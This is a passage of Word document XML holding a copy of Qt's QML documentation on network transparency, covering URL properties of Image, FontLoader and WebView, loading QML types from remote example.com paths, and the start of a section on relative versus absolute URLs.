          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Image</w:t>
      </w:r>
      <w:r w:rsidRPr="00B71BEF">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00B71BEF">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>{</w:t>
      </w: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71BEF">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">    source</w:t>
      </w:r>
      <w:r w:rsidRPr="00B71BEF">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidRPr="00B71BEF">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00B71BEF">
        <w:rPr>
          <w:rStyle w:val="str"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="AAAAAA"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>"images/logo.png"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B71BEF" w:rsidRPr="00B71BEF" w:rsidRDefault="00B71BEF" w:rsidP="00B71BEF">
      <w:pPr>
        <w:pStyle w:val="HTML0"/>
        <w:shd w:val="clear" w:color="auto" w:fill="3A4055"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B71BEF">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B71BEF" w:rsidRPr="00B71BEF" w:rsidRDefault="00B71BEF" w:rsidP="00B71BEF">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="360" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B71BEF">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Network transparency is supported throughout QML, for example:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B71BEF" w:rsidRPr="00B71BEF" w:rsidRDefault="00B71BEF" w:rsidP="00064AC7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="32"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="278" w:lineRule="atLeast"/>
        <w:ind w:left="525"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008F083E">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Fonts</w:t>
      </w:r>
      <w:r w:rsidRPr="00B71BEF">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> - the</w:t>
      </w:r>
      <w:r w:rsidRPr="00B71BEF">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00B71BEF">
        <w:rPr>
          <w:rStyle w:val="HTML2"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>source</w:t>
      </w:r>
      <w:r w:rsidRPr="00B71BEF">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00B71BEF">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>property of</w:t>
      </w:r>
      <w:r w:rsidRPr="00B71BEF">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId393" w:history="1">
        <w:r w:rsidRPr="00B71BEF">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="17A81A"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>FontLoader</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00B71BEF">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00B71BEF">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>is a URL</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B71BEF" w:rsidRPr="00B71BEF" w:rsidRDefault="00B71BEF" w:rsidP="00064AC7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="32"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="278" w:lineRule="atLeast"/>
        <w:ind w:left="525"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008F083E">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>WebViews</w:t>
      </w:r>
      <w:r w:rsidRPr="00B71BEF">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> - the</w:t>
      </w:r>
      <w:r w:rsidRPr="00B71BEF">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00B71BEF">
        <w:rPr>
          <w:rStyle w:val="HTML2"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>url</w:t>
      </w:r>
      <w:r w:rsidRPr="00B71BEF">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00B71BEF">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>property of</w:t>
      </w:r>
      <w:r w:rsidRPr="00B71BEF">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId394" w:history="1">
        <w:r w:rsidRPr="00B71BEF">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="17A81A"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>WebView</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00B71BEF">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00B71BEF">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>(obviously!)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B71BEF" w:rsidRPr="00B71BEF" w:rsidRDefault="00B71BEF" w:rsidP="00B71BEF">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B71BEF">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Even </w:t>
      </w:r>
      <w:r w:rsidRPr="008F083E">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>QML types themselves can be on the network</w:t>
      </w:r>
      <w:r w:rsidRPr="00B71BEF">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> - if the</w:t>
      </w:r>
      <w:r w:rsidRPr="00B71BEF">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId395" w:history="1">
        <w:r w:rsidRPr="00B71BEF">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="17A81A"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Prototyping with qmlscene</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00B71BEF">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00B71BEF">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>is used to load</w:t>
      </w:r>
      <w:r w:rsidRPr="00B71BEF">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00B71BEF">
        <w:rPr>
          <w:rStyle w:val="HTML2"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>http://example.com/mystuff/Hello.qml</w:t>
      </w:r>
      <w:r w:rsidRPr="00B71BEF">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00B71BEF">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>and that content refers to a type "World", the engine will load</w:t>
      </w:r>
      <w:r w:rsidRPr="00B71BEF">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00B71BEF">
        <w:rPr>
          <w:rStyle w:val="HTML2"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>http://example.com/mystuff/qmldir</w:t>
      </w:r>
      <w:r w:rsidRPr="00B71BEF">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00B71BEF">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>and resolve the type just as it would for a local file. For example if the qmldir file contains the line "World World.qml", it will load</w:t>
      </w:r>
      <w:r w:rsidRPr="00B71BEF">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00B71BEF">
        <w:rPr>
          <w:rStyle w:val="HTML2"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>http://example.com/mystuff/World.qml</w:t>
      </w:r>
      <w:r w:rsidRPr="00B71BEF">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00B71BEF">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Any other resources that</w:t>
      </w:r>
      <w:r w:rsidRPr="00B71BEF">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00B71BEF">
        <w:rPr>
          <w:rStyle w:val="HTML2"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Hello.qml</w:t>
      </w:r>
      <w:r w:rsidRPr="00B71BEF">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00B71BEF">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>referred to, usually by a relative URL, would similarly be loaded from the network.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B71BEF" w:rsidRPr="00B71BEF" w:rsidRDefault="00B71BEF" w:rsidP="008D55B3">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="492" w:name="relative-vs-absolute-urls"/>
      <w:bookmarkStart w:id="493" w:name="_Toc483000636"/>
      <w:bookmarkStart w:id="494" w:name="_Toc483003653"/>
      <w:bookmarkStart w:id="495" w:name="_Toc483603989"/>
      <w:bookmarkStart w:id="496" w:name="_Toc483605209"/>
      <w:bookmarkEnd w:id="492"/>
      <w:r w:rsidRPr="008D55B3">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Relative vs. Absolute URLs</w:t>
      </w:r>
      <w:bookmarkEnd w:id="493"/>
      <w:bookmarkEnd w:id="494"/>
      <w:bookmarkEnd w:id="495"/>
      <w:bookmarkEnd w:id="496"/>
    </w:p>
    <w:p w:rsidR="00B71BEF" w:rsidRPr="00B71BEF" w:rsidRDefault="00B71BEF" w:rsidP="00B71BEF">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B71BEF">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Whenever an object has a </w:t>
      </w:r>
      <w:r w:rsidRPr="00A93425">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>property of type URL (</w:t>
      </w:r>
      <w:hyperlink r:id="rId396" w:history="1">
        <w:r w:rsidRPr="00A93425">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="17A81A"/>
            <w:highlight w:val="yellow"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>QUrl</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00A93425">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:r w:rsidRPr="00B71BEF">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">, assigning a string to that property will actually assign </w:t>
      </w:r>
      <w:r w:rsidRPr="00A93425">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>an absolute URL</w:t>
      </w:r>
      <w:r w:rsidRPr="00B71BEF">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> - </w:t>
      </w:r>
      <w:r w:rsidRPr="00A93425">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>by resolving</w:t>
      </w:r>
      <w:r w:rsidRPr="00B71BEF">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> the string against the URL of the document where the string is used.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B71BEF" w:rsidRPr="00B71BEF" w:rsidRDefault="00B71BEF" w:rsidP="00B71BEF">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B71BEF">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">For </w:t>
      </w:r>
      <w:r w:rsidRPr="00A93425">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>example</w:t>
      </w:r>
      <w:r w:rsidRPr="00B71BEF">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>, consider this content in</w:t>
      </w:r>
      <w:r w:rsidRPr="00B71BEF">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00B71BEF">
        <w:rPr>
          <w:rStyle w:val="HTML2"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>http://example.com/mystuff/test.qml</w:t>
      </w:r>
      <w:r w:rsidRPr="00B71BEF">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
